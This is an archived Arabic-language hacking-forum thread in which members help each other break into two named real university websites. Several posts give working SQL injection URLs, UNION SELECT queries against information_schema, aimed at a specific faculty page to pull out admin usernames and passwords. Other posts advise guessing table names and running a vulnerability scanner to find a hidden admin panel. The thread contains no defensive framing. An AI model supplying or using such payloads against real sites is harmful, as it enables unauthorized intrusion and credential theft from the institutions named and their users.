:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)
-   -   مساعدة في هذين الموقعين (http://www.vbspiders.com/vb/showthread.php?t=39862)

إسلام العالم 11-26-2010 01:51 AM
مساعدة في هذين الموقعين
 
السلام عليكم يا إخوة...

ممكن تقولوا لي وين غلطي في هذين الموقيعن:

1-

http://physiology.case.edu/faculty.php?id=114

http://physiology.case.edu/faculty.p...20115,%2037%29

في هذا الموقع لا يظهر لي عامود اليوزر و الباس؟؟؟

2-


http://www.mbc.edu/

مسار لوحة التحكم هو هذا : http://www.mbc.edu/admin/index.php

بس مو راضي يفوت على مسار التحكم ليش؟؟؟؟؟؟؟؟؟؟

خالد سعودي 11-26-2010 02:15 AM
إسلام العالم

هلا فيك ياغالي عندك خطا في الحقن راجع معي
كود PHP:
http://physiology.case.edu/faculty.php?id=-114 UNION SELECT 1,2,3,4,5,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10
+from+information_schema.columns+Where+column_name+LIKE+CHAR(371129737
انت حول تراجع الدوره
اذمانفع معاك pas ممكن ماخفيفه جرب pa فقط
الان تمام كمل عليه شوف الرابط تتااكد من الخطا الاملائية

إسلام العالم 11-26-2010 11:48 AM
أخي بارك الله فيك

الرابط الذي وضعته أظهر لي الجداول التالية :

TABLESPACE_NAME>information_schema>FILES,
PARTITION_NAME>information_schema>PARTITIONS,
SUBPARTITION_NAME>information_schema>PARTITIONS,
PARTITION_ORDINAL_POSITION>information_schema>PART ITIONS,
SUBPARTITION_ORDINAL_POSITION>information_schema>P ARTITIONS,
PARTITION_METHOD>information_schema>PARTITIONS,
SUBPARTITION_METHOD>information_schema>PART

ولا واحدة فيها password أو pass أو أي شيء يدل على الباسوورد

awras 11-26-2010 01:16 PM
اخي العزيز مافي جدول في قاعده البيانان باسم يوزر او باس
جرب غير اسماء
انا وجدت اسم احد الحداول وانت ابحث عن الباقين وعن الحقول تيع الادمن او الباسوورد
http://physiology.case.edu/faculty.php?id=-114 UNION SELECT 1,2,3,4,5,6,7,8,9,10+from+master--

إسلام العالم 11-26-2010 01:43 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة awras (المشاركة 258117)
اخي العزيز مافي جدول في قاعده البيانان باسم يوزر او باس
جرب غير اسماء
انا وجدت اسم احد الحداول وانت ابحث عن الباقين وعن الحقول تيع الادمن او الباسوورد
http://physiology.case.edu/faculty.php?id=-114 UNION SELECT 1,2,3,4,5,6,7,8,9,10+from+master--
أليس من المفروض عن حقني للموقع أن يظهر إسم الجدول مع العامود؟؟؟؟

هذا ما أتكلم عنه أنا فلم يظهر مع أنه الحقنة صحيحة؟؟؟؟

فهل يجب في هذه الحالة بدأ بالتخمين؟؟؟؟؟

awras 11-26-2010 02:29 PM
صحيح اخي انت تشفر كلمه pass or password or username or email
وبعدين تحقن ويطلع اسم الجدول والحقول
لكن في سكربتات مافيها باس او يوزر فيها اسماء تختلف وغير معروفه احيانا
لهذا يكون دور تخمين وباشكال مختلفه
فهمت ؟؟

خالد سعودي 11-26-2010 03:05 PM
هلا فيك ياغالي وبحث ماحصلت الباس واليوزر ممكن ماقال اخونا awras بارك الله فيك ان سكربت مافيها باس ويوزر

إسلام العالم 11-26-2010 05:19 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة awras (المشاركة 258151)
صحيح اخي انت تشفر كلمه pass or password or username or email
وبعدين تحقن ويطلع اسم الجدول والحقول
لكن في سكربتات مافيها باس او يوزر فيها اسماء تختلف وغير معروفه احيانا
لهذا يكون دور تخمين وباشكال مختلفه
فهمت ؟؟
نعم فهمت أخي
جزاك الله خيرا..

ماذا عن الموقع الثاني ؟؟؟مشكلة لوحة الأدمن؟؟؟؟

awras 11-26-2010 10:02 PM
اخي هاد مش مسار لوحه التحكم
http://www.mbc.edu/admin/index.php
اعتقد انو حاططهه للتمويه
انا فحصت الموقع ببرنامج
Acunetix Web Vulnerability Scanner 7
وطلع فيه ملفات كتيرره
اما ان يكون اسم لوحه التحكم غير اسم او انو حاذفهه ويعتمد فقط عله الاف تي بي
هاد الي اعرفو فقط

خالد سعودي 12-02-2010 03:13 AM
نعم في مواقع تكون مسار الوحه التحكم تمويه
هذا البرنامج حلو انا استخدمه Acunetix Web Vulnerability Scanner 7
بصراحه ساعدك awras .



ولكن حاول تشوف سكربت المركبه على الموقع كيف دخوله
موفق


الساعة الآن 04:17 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0